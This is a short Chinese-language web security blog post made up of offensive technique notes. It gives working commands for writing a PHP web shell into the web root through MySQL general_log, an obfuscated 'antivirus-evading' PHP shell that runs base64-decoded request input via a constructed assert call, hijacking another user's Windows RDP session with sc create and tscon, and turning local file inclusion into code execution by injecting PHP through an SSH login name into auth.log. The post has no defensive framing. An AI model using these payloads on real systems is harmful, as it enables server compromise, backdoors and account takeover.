- A+
所属分类:WEB安全
SQL语句利用日志写shell
outfile被禁止,或者写入文件被拦截;
在数据库中操作如下:(必须是root权限)
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址
select '<?php eval($_POST[cmd]);?>' #写入shell
SQL查询免杀shell的语句
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
windows切换其他登陆用户
查看用户:
C:\Windows\system32>query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
administrator 1 Disc 1 3/12/2017 3:07 PM
>localadmin rdp-tcp#55 2 Active . 3/12/2017 3:10 PM
C:\Windows\system32>
创建服务:
C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"[SC] CreateService SUCCESS
启动服务:
net setart sesshijack
LFI SSH日志
登陆SSH:
ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105
包含文件:
http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫